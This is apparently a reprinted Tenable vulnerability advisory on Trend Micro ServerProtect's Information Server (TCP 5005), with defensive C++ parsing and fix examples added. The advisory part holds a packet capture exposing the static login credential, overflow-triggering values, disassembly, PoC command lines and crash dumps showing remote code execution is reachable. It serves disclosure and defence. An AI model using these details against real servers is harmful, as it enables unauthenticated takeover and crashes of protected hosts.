Multiple Vulnerabilities in Trend Micro ServerProtect

Penetration techniques | 3 years ago (2022) | admin

Summary

While researching Nessus plugin coverage for CVE-2021-36745, Tenable discovered multiple vulnerabilities in Trend Micro ServerProtect for Microsoft Windows/Novell NetWare 5.8 build 1575.


1) Information Server Static Credential – CVE-2022-25329

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


When the console type in a command 2 (CMD_REGISTER) message is 1, the Information Server (EarthAgent.exe) authenticates the client using a static credential. An unauthenticated remote attacker can use this credential to register/log in to the server and perform the operations permitted to a registered/authenticated client console. The following Wireshark stream capture shows a successful client console registration:

00000000 21 43 65 87 02 00 00 00 00 00 00 00 00 00 00 00 !Ce..... ........
00000010 7c 01 00 00 e8 03 00 00 00 00 00 00 73 65 72 76 |....... ....serv
00000020 65 72 70 72 6f 74 65 63 74 5f 69 6e 66 6f 5f 73 erprotec t_info_s
00000030 65 72 76 65 72 2e 70 79 00 00 00 00 00 00 00 00 erver.py ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000060 e8 03 00 00 01 00 00 00 21 00 43 00 52 00 59 00 ........ !.C.R.Y.
00000070 50 00 54 00 21 00 31 00 30 00 38 00 37 00 43 00 P.T.!.1. 0.8.7.C.
00000080 38 00 41 00 38 00 35 00 34 00 42 00 42 00 45 00 8.A.8.5. 4.B.B.E.
00000090 38 00 38 00 44 00 33 00 45 00 35 00 35 00 34 00 8.8.D.3. E.5.5.4.
000000A0 37 00 33 00 36 00 46 00 33 00 39 00 00 00 00 00 7.3.6.F. 3.9.....
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000170 00 00 0c 00 00 00 00 00 00 00 00 00             ........ ....
    00000000 21 43 65 87 02 00 00 00 00 00 00 00 00 00 00 00 !Ce..... ........
    00000010 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
    00000020 c8 25 75 00 00 00 00 00 a0 ae 0c 01 00 00 00 00 .%u..... ........
    00000030 00 00 00 00 fc bc 0c 01 60 01 00 00 03 00 00 00 ........ `.......
    00000040 63 ab 5c 60 82 10 00 00 fc bc 0c 01 6e ab 5c 60 c.\`.... ....n.\`
    00000050 40 fe 6b 00 00 00 00 00 04 84 00 00 cc 04 00 00 @.k..... ........
    00000060 00 00 0c 01 60 01 00 00 a4 fd aa 02 a0 ae 0c 01 ....`... ........
    00000070 10 fd 6b 00 5e d3 2c 77 04 84 00 00 5e d3 2c 77 ..k.^.,w ....^.,w
    00000080 00 00 00 00                                     ....

2) Information Server Command 73730 Integer Overflow – CVE-2022-25330

(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)


Command 73730, sent to TCP port 5005 of the Information Server, is used to get the list of Normal Servers on a remote Windows host by querying the remote registry keys under HKLM\SOFTWARE\WOW6432Node\Trend\ServerProtect\CurrentVersion\InformationServer\<domain>\<Normal Server name>. The command specifies the hostname/IP of the remote host, the credentials to use on that host, and the maximum number of Normal Servers to retrieve. The command has the following format:

// le32 = 32-bit integer in little endian format
struct header
{
   le32 magic; // must be 0x87654321
   le32 cmd;   // command
   le32 error; // error code seen used in response
   le32 unk;   // num of items
   le32 len;   // total message length including this header
   le32 cport; // console port, used with client IP to identify
               // the client console
   byte unk[4];
};

struct cmd_73730
{
   header hdr;          // hdr.cmd must be 73730
   byte rhost[56];      // remote Windows host
   byte username[128];  // credentials to access the
   byte password[128];  // registry on the remote host
   le32 max_cnt;        // max number of Normal Servers to get
};
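As an added example (not code from Tenable's advisory or its POC scripts, and not Trend Micro's), the C++ below parses the 28-byte header and the cmd_73730 body using exactly the layout just given, and assigns a triage verdict to a captured TCP/5005 message: it reports CMD_REGISTER (command 2) messages of the kind shown in the capture in section 1, so that registrations can be counted per source, and it reports command 73730 messages whose max_cnt would wrap the server's 32-bit max_cnt * 56 computation. The byte samples are constructed: the registration sample reuses the captured header with its body zero-filled, and the 73730 sample uses placeholder host and user names; the 56-byte entry size is taken from the disassembly of the 73730 handler.

```cpp
// Added example (not Tenable's code, nor Trend Micro's): a parser for the
// Information Server message header and the cmd_73730 body as laid out in
// the advisory, plus a triage verdict for captured TCP/5005 messages.
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <string>
#include <vector>

namespace sp {

constexpr uint32_t kMagic       = 0x87654321; // header.magic
constexpr uint32_t kHeaderLen   = 28;         // 6 x le32 + byte unk[4]
constexpr uint32_t kCmdRegister = 2;          // CMD_REGISTER
constexpr uint32_t kCmd73730    = 73730;
constexpr uint32_t kEntrySize   = 56;         // bytes per Normal Server entry ("max_cnt * 56")
constexpr size_t   kBody73730   = 56 + 128 + 128 + 4;

struct Header   { uint32_t magic, cmd, error, unk, len, cport; uint8_t unk2[4]; };
struct Cmd73730 { std::string rhost, username; uint32_t max_cnt; }; // password is not retained

enum class Verdict { Benign, Registration, OverflowingMaxCnt, Malformed };

static uint32_t le32(const uint8_t* p) {
    return uint32_t(p[0]) | uint32_t(p[1]) << 8 | uint32_t(p[2]) << 16 | uint32_t(p[3]) << 24;
}

// NUL-padded fixed-width field -> std::string (stops at the first NUL or at n)
static std::string field(const uint8_t* p, size_t n) {
    size_t l = 0;
    while (l < n && p[l] != 0) ++l;
    return std::string(reinterpret_cast<const char*>(p), l);
}

// Accepts a message only if the header is complete, the magic matches and the
// declared total length equals the number of bytes actually captured.
bool parse_header(const std::vector<uint8_t>& buf, Header& h) {
    if (buf.size() < kHeaderLen) return false;
    h.magic = le32(&buf[0]);  h.cmd = le32(&buf[4]);  h.error = le32(&buf[8]);
    h.unk   = le32(&buf[12]); h.len = le32(&buf[16]); h.cport = le32(&buf[20]);
    std::memcpy(h.unk2, &buf[24], 4);
    return h.magic == kMagic && h.len >= kHeaderLen && h.len == buf.size();
}

bool parse_cmd_73730(const std::vector<uint8_t>& buf, Cmd73730& c) {
    Header h;
    if (!parse_header(buf, h) || h.cmd != kCmd73730) return false;
    if (buf.size() < kHeaderLen + kBody73730) return false;
    const uint8_t* b = &buf[kHeaderLen];
    c.rhost    = field(b, 56);
    c.username = field(b + 56, 128);
    c.max_cnt  = le32(b + 56 + 128 + 128);   // password[128] is skipped
    return true;
}

Verdict triage(const std::vector<uint8_t>& buf) {
    Header h;
    if (!parse_header(buf, h)) return Verdict::Malformed;
    if (h.cmd == kCmdRegister) return Verdict::Registration;
    if (h.cmd == kCmd73730) {
        Cmd73730 c;
        if (!parse_cmd_73730(buf, c)) return Verdict::Malformed;
        // The server multiplies in 32 bits; doing it in 64 bits exposes the wrap.
        if (uint64_t(c.max_cnt) * kEntrySize > 0xFFFFFFFFull) return Verdict::OverflowingMaxCnt;
    }
    return Verdict::Benign;
}

// Sample 1 (constructed): the 28-byte header of the registration request in
// the advisory's capture, with the 352-byte body zero-filled for brevity.
std::vector<uint8_t> sample_register() {
    static const uint8_t hdr[kHeaderLen] = {
        0x21,0x43,0x65,0x87, 0x02,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
        0x7c,0x01,0x00,0x00, 0xe8,0x03,0x00,0x00, 0x00,0x00,0x00,0x00 };
    std::vector<uint8_t> m(0x17c);           // len field says 0x17c bytes in total
    std::memcpy(m.data(), hdr, sizeof hdr);
    return m;
}

// Sample 2 (constructed): a command 73730 message with placeholder host and
// user name and a caller-chosen max_cnt (the advisory's 0x04924925 wraps).
std::vector<uint8_t> sample_73730(uint32_t max_cnt) {
    const uint32_t len = kHeaderLen + kBody73730;
    std::vector<uint8_t> m(len);
    auto put32 = [&](size_t off, uint32_t v) { for (int i = 0; i < 4; ++i) m[off + i] = uint8_t(v >> (8 * i)); };
    put32(0, kMagic); put32(4, kCmd73730); put32(16, len); put32(20, 1000);
    const char host[] = "host.example.invalid", user[] = "placeholder-user";
    std::memcpy(&m[kHeaderLen], host, sizeof host);
    std::memcpy(&m[kHeaderLen + 56], user, sizeof user);
    put32(kHeaderLen + 56 + 128 + 128, max_cnt);
    return m;
}

} // namespace sp

int main() {
    static const char* names[] = { "benign", "registration", "overflowing max_cnt", "malformed" };
    std::printf("register : %s\n", names[int(sp::triage(sp::sample_register()))]);
    std::printf("cmd 73730: %s\n", names[int(sp::triage(sp::sample_73730(0x04924925)))]);
    return 0;
}
```

The length check in parse_header is deliberately strict: a message whose declared len disagrees with the bytes on the wire is reported as malformed rather than parsed further, which is the behaviour you want from a monitoring parser sitting in front of a server that trusts its own header fields.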

An integer overflow exists when EarthAgent.exe uses the attacker-supplied max_cnt to allocate heap memory for the data retrieved from the registry on the host specified in the command:

EarthAgent.exe 5.80.0.1575
<...snip...>
.text:004321D3      lea     edx, [esp+2ACh+arg_hdr.max_cnt]
.text:004321DA      push    ebx
.text:004321DB      push    edx
.text:004321DC      push    73730
.text:004321E1      mov     ecx, esi
.text:004321E3      call    obj30_RetrieveDataFromBuffer ; return true/false
.text:004321E8      test    eax, eax
.text:004321EA      jz      loc_4324D0
.text:004321F0      mov     eax, [esp+2A4h+arg_hdr.max_cnt] ; attacker-controlled
.text:004321F7      lea     ecx, ds:0[eax*8]
.text:004321FE      sub     ecx, eax
.text:00432200      shl     ecx, 3 ; max_cnt * 56 -> int32 overflow!
.text:00432203      push    ecx
.text:00432204      call    operator new(uint)
<...snip...>

A large max_cnt (e.g. 0x04924925) can therefore produce a small heap buffer (i.e. (0x04924925 * 56) & 0xffffffff = 0x18).


When exploited together with vulnerability 1), an unauthenticated remote attacker can specify his/her own Windows host, the credentials to access it, and a large max_cnt in a command 73730 message and send it to the ServerProtect Information Server host on TCP port 5005. This can cause a heap-based buffer overflow in EarthAgent.exe, as a large number of attacker-controlled Normal Server names can be copied from the remote registry into a small heap buffer. This can lead to process termination or remote code execution.


POC:

python3 serverprotect_info_server_cmd_73730_int32_overflow.py -t <target> -p 5005 -A <attacker-win-host> -U administrator -P <admin_password>
Registered a client console OK
Sending a specially crafted command 73730 message
Traceback (most recent call last):
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 119, in <module>
    r = read_msg(s)
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 40, in read_msg
    msg = recv_msg(sock)
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 22, in recv_msg
    data = recvall(sock, 0x1C)
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 12, in recvall
    packet = sock.recv(n - len(data))
ConnectionResetError: [Errno 104] Connection reset by peer

The heap corruption caused by the heap buffer overflow is shown below:

(1e60.ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=010b35e0 ecx=00004141 edx=41414141 esi=00000005 edi=010b0000
eip=772ceb37 esp=0356f7fc ebp=0356f9bc iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlpAllocateHeap+0x397:
772ceb37 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=????????
0:017> k
 # ChildEBP RetAddr
00 0356f9bc 772ce5f0 ntdll!RtlpAllocateHeap+0x397
01 0356fa60 772cd35e ntdll!RtlpAllocateHeapInternal+0x1280
02 0356fa7c 771f87c0 ntdll!RtlAllocateHeap+0x3e
03 0356fa9c 009b38d6 msvcrt!malloc+0x90
WARNING: Stack unwind information not available. Following frames may be wrong.
04 0356fab4 00a068d1 MFC42u!Ordinal823+0x17
05 00000000 00000000 MFC42u!Ordinal6135+0x42

3) Information Server Command 36885 Integer Overflow – CVE-2022-25330

(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

An integer overflow condition exists in EarthAgent.exe when handling a command 36885 message. When exploited together with vulnerability 1), an unauthenticated remote attacker can crash the process or achieve remote code execution by sending a specially crafted command 36885 message to TCP port 5005.


The listing below shows the vulnerability:

EarthAgent.exe 5.80.0.1575
<...snip...>
.text:0042CAA2      add     eax, 760h   ; attacker-controlled eax,
.text:0042CAA2                          ; int32 overflow if eax=0xFFFFF8A0
.text:0042CAA7      cmp     eax, 989680h
.text:0042CAAC      mov     dword ptr [esp+11B8h+allocSize], eax
.text:0042CAB0      ja      loc_42CBFA
.text:0042CAB6      push    eax
.text:0042CAB7      call    operator new(uint)
.text:0042CABC      mov     ebx, eax    ; int32 overflow -> small heap buffer
.text:0042CABC                          ; allocated
.text:0042CABE      add     esp, 4
.text:0042CAC1      test    ebx, ebx
.text:0042CAC3      jz      loc_42CBFA
.text:0042CAC9      mov     ecx, dword ptr [esp+11B8h+allocSize]
.text:0042CACD      xor     eax, eax
.text:0042CACF      mov     edx, ecx
.text:0042CAD1      mov     edi, ebx
.text:0042CAD3      shr     ecx, 2
.text:0042CAD6      rep stosd
.text:0042CAD8      mov     ecx, edx
.text:0042CADA                          ; copy 0x768 bytes to a small
.text:0042CADA                          ; heap buffer -> heap corruption
.text:0042CADA                          ; RCE possible?
.text:0042CADA      push    768h
.text:0042CADF      and     ecx, 3
.text:0042CAE2      rep stosb
.text:0042CAE4      lea     eax, [esp+11BCh+Src] ; 0xC4 bytes of source is
.text:0042CAE4                          ; attacker-controlled
.text:0042CAEB      push    eax
.text:0042CAEC      push    ebx
.text:0042CAED      call    ds:memmove
<...snip...>

POC:

python3 serverprotect_info_server_dos.py -t <target> -p 5005 -c 36885
Connection 1
Registered a client console OK
Sending a specially crafted command 36885 message
Connection 2
Registered a client console OK
Sending a specially crafted command 36885 message
Connection 3
Traceback (most recent call last):
  File "/work/0day/serverprotect_info_server_dos.py", line 144, in <module>
    r = read_msg(s)
  File "/work/0day/serverprotect_info_server_dos.py", line 40, in read_msg
    msg = recv_msg(sock)
  File "/work/0day/serverprotect_info_server_dos.py", line 22, in recv_msg
    data = recvall(sock, 0x1C)
  File "/work/0day/serverprotect_info_server_dos.py", line 12, in recvall
    packet = sock.recv(n - len(data))
ConnectionResetError: [Errno 104] Connection reset by peer

The heap corruption caused by the heap buffer overflow is shown below:

0:015> g
(6bc.1f60): C++ EH exception - code e06d7363 (first chance)
(6bc.1f60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=011645f0 ebx=00000000 ecx=41414141 edx=00000000 esi=41414141 edi=02a1f848
eip=41414141 esp=02a1f61c ebp=02a1f648 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???
0:005> k
 # ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 02a1f618 771eb826 0x41414141
01 02a1f648 771eb7e5 msvcrt!terminate+0x26
02 02a1f678 771eaf94 msvcrt!_inconsistency+0x2c
03 02a1f6d4 771eb5b8 msvcrt!FindHandler+0x3db
04 02a1f708 771ec1b6 msvcrt!__InternalCxxFrameHandler+0xf7
05 02a1f744 77316482 msvcrt!__CxxFrameHandler+0x26
06 02a1f768 77316454 ntdll!ExecuteHandler2+0x26
07 02a1f830 77303a06 ntdll!ExecuteHandler+0x24
08 02a1f830 74a335e2 ntdll!KiUserExceptionDispatcher+0x26
09 02a1fd54 771eb8f8 KERNELBASE!RaiseException+0x62
0a 02a1fd98 00a31401 msvcrt!_CxxThrowException+0x68
0b 02a1fdac 00a38831 MFC42u!Ordinal1259
0c 02a1fdb0 00a38858 MFC42u!Ordinal1198+0x5
0d 02a1fdc8 004164e3 MFC42u!Ordinal1167+0x24
0e 02a1fe98 74a21e76 EarthAgent+0x164e3
0f 02a1fec0 ffffffff KERNELBASE!CloseHandle+0x26
10 02a1ff30 77217e71 0xffffffff
11 02a1ff68 77217f31 msvcrt!_callthreadstartex+0x25
12 02a1ff70 75190419 msvcrt!_threadstartex+0x61
13 02a1ff80 772f72fd KERNEL32!BaseThreadInitThunk+0x19
14 02a1ffdc 772f72cd ntdll!__RtlUserThreadStart+0x2f
15 02a1ffec 00000000 ntdll!_RtlUserThreadStart+0x1b

4) Information Server Command DoS – CVE-2022-25331

(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)


The C++ new operator in EarthAgent.exe can raise an unhandled exception when the requested allocation size is large. When exploited together with vulnerability 1), an unauthenticated remote attacker can crash the process by sending a specially crafted command message to TCP port 5005.


The following commands are affected: 4098, 8221, 8222, 8226, 12308, 12309, 36867, 36869, 36898, 41010, 41014 and 65549.


The listing below shows the vulnerability affecting command 4098:

EarthAgent.exe 5.80.0.1575
<...snip...>
.text:00423579      lea     ecx, ds:0[eax*8]
.text:00423580      mov     [esp+64Ch+arg_hdr.max_cnt], eax
.text:00423587      sub     ecx, eax
.text:00423589      shl     ecx, 3      ; 56x
.text:0042358C      push    ecx         ; attacker-controlled allocation size,
.text:0042358C                          ; unhandled exception DoS
.text:0042358D      call    operator new(uint)
<...snip...>

POC:

python3 serverprotect_info_server_dos.py -t <target> -p 5005 -c 4098
Connection 1
Registered a client console OK
Sending a specially crafted command 4098 message
Connection 2
Registered a client console OK
Sending a specially crafted command 4098 message
Connection 3
Registered a client console OK
Sending a specially crafted command 4098 message
Connection 4
Traceback (most recent call last):
  File "/work/0day/serverprotect_info_server_dos.py", line 144, in <module>
    r = read_msg(s)
  File "/work/0day/serverprotect_info_server_dos.py", line 40, in read_msg
    msg = recv_msg(sock)
  File "/work/0day/serverprotect_info_server_dos.py", line 22, in recv_msg
    data = recvall(sock, 0x1C)
  File "/work/0day/serverprotect_info_server_dos.py", line 12, in recvall
    packet = sock.recv(n - len(data))
ConnectionResetError: [Errno 104] Connection reset by peer

For details, see the linked POC script serverprotect_info_server_dos.py.
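As an added example (not Tenable's or Trend Micro's code), the C++ below models the allocation-size arithmetic from the three listings in 32-bit unsigned arithmetic, the way the x86 code computes it, beside a checked version of each: the max_cnt * 56 multiplication of commands 73730 and 4098, the add-then-compare ordering of command 36885, and a handler that validates the size before calling new and catches std::bad_alloc so that one rejected message cannot terminate the process. The ceiling 0x989680 is taken from the 36885 listing and reused as the cap for the other cases; that reuse is this example's assumption, not the vendor's fix.

```cpp
// Added example (not Tenable's or Trend Micro's code): the allocation-size
// arithmetic from the three listings, modelled in 32-bit unsigned arithmetic
// as the x86 code does it, next to a checked version of each.
#include <cstdint>
#include <cstdio>
#include <memory>
#include <new>

namespace sp {

constexpr uint32_t kEntrySize = 56;       // "max_cnt * 56" (commands 73730 and 4098)
constexpr uint32_t kFixedPart = 0x760;    // "add eax, 760h" (command 36885)
constexpr uint32_t kCopyLen   = 0x768;    // "push 768h ... call ds:memmove" (command 36885)
constexpr uint32_t kMaxAlloc  = 0x989680; // "cmp eax, 989680h": the 36885 handler's own ceiling (10,000,000)

// --- commands 73730 / 4098: multiplication in a 32-bit register ------------

// Vulnerable: lea/sub/shl compute max_cnt*56 modulo 2^32.
uint32_t vuln_size_mul(uint32_t max_cnt) {
    return max_cnt * kEntrySize;          // 0x04924925 -> 0x18, as the advisory shows
}

// Checked: refuse a count whose product cannot fit, then apply a ceiling.
// Using kMaxAlloc as that ceiling is this example's assumption.
bool checked_size_mul(uint32_t max_cnt, uint32_t& out) {
    if (max_cnt > UINT32_MAX / kEntrySize) return false;   // product would wrap
    uint32_t bytes = max_cnt * kEntrySize;
    if (bytes > kMaxAlloc) return false;
    out = bytes;
    return true;
}

// --- command 36885: addition, then a bound check that comes too late -------

// Vulnerable: add first, compare second. 0xFFFFF8A0 + 0x760 wraps to 0, which
// passes "cmp eax, 989680h / ja", so a tiny buffer receives a 0x768-byte copy.
bool vuln_size_add(uint32_t attacker_len, uint32_t& alloc) {
    alloc = attacker_len + kFixedPart;
    return alloc <= kMaxAlloc;
}

// Checked: bound the input before adding so the sum cannot wrap, and require
// the buffer to hold everything that will be copied into it.
bool checked_size_add(uint32_t attacker_len, uint32_t& alloc) {
    if (attacker_len > kMaxAlloc - kFixedPart) return false;
    alloc = attacker_len + kFixedPart;
    return alloc >= kCopyLen;
}

// --- vulnerability 4): operator new(uint) throwing on a huge size ----------

// Validate before allocating, and never let std::bad_alloc escape a message
// handler: a rejected message is a protocol error, not a reason to exit.
std::unique_ptr<uint8_t[]> alloc_entries(uint32_t max_cnt) {
    uint32_t bytes;
    if (!checked_size_mul(max_cnt, bytes)) return nullptr;
    try {
        return std::unique_ptr<uint8_t[]>(new uint8_t[bytes]());
    } catch (const std::bad_alloc&) {
        return nullptr;
    }
}

} // namespace sp

int main() {
    uint32_t s = 0;
    std::printf("73730 vuln : max_cnt=0x04924925 -> %#x bytes\n", sp::vuln_size_mul(0x04924925));
    std::printf("73730 fixed: accepted=%d\n", sp::checked_size_mul(0x04924925, s));
    bool v = sp::vuln_size_add(0xFFFFF8A0, s);
    std::printf("36885 vuln : passes check=%d alloc=%#x\n", v, s);
    std::printf("36885 fixed: accepted=%d\n", sp::checked_size_add(0xFFFFF8A0, s));
    std::printf("4098 fixed : buffer=%s\n", sp::alloc_entries(0xFFFFFFFF) ? "allocated" : "rejected");
    return 0;
}
```

The rule both checked versions follow is to bound the input before the arithmetic rather than the result after it: a comparison placed after a wrapped add or multiply only ever sees the wrapped value, which is exactly why the 36885 handler's existing cmp/ja does not help.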


Solution

Apply the patch recommended in the vendor advisory for the affected ServerProtect platform.


Proof of Concept

https://github.com/tenable/poc/blob/master/TrendMicro/ServerProtect/serverprotect_info_server_cmd_73730_int32_overflow.py
https://github.com/tenable/poc/blob/master/TrendMicro/ServerProtect/serverprotect_info_server_dos.py


Disclosure Timeline

October 20, 2021 – Vulnerabilities discovered

November 30, 2021 – Tenable reports the vulnerabilities to the vendor

December 1, 2021 – Vendor requests the POC scripts referenced in the vulnerability report and specifies a password to use for encryption

December 3, 2021 – Tenable sends the vendor the POC scripts, zipped and encrypted with the specified password

December 23, 2021 – Tenable asks the vendor to confirm receipt of the POC scripts and requests the vulnerability verification status

December 23, 2021 – Vendor confirms receipt of the POC

December 23, 2021 – Vendor confirms the vulnerabilities have been verified; the fix is expected to be released in January 2022

February 14, 2022 – Tenable asks the vendor for an updated release date

February 15, 2022 – Vendor informs Tenable that the fix will be released that week and asks for an extension of the disclosure date

February 18, 2022 – Vendor informs Tenable that the fix has been released and that they are coordinating their security advisory internally

February 22, 2022 – Tenable declines to extend the disclosure date and requests CVE information

February 22, 2022 – Vendor publishes its advisory

All information in TRA advisories is provided "as is" without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.


Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you work with us to resolve it quickly in order to protect customers. Tenable believes in responding quickly to such reports, staying in communication with researchers, and providing a resolution in a short time frame.


Originally published on the WeChat official account (Ots安全): Multiple Vulnerabilities in Trend Micro ServerProtect

Copyright notice: published by admin on March 9, 2022 at 8:51 AM.
Please credit when reprinting: Multiple Vulnerabilities in Trend Micro ServerProtect | CTF导航
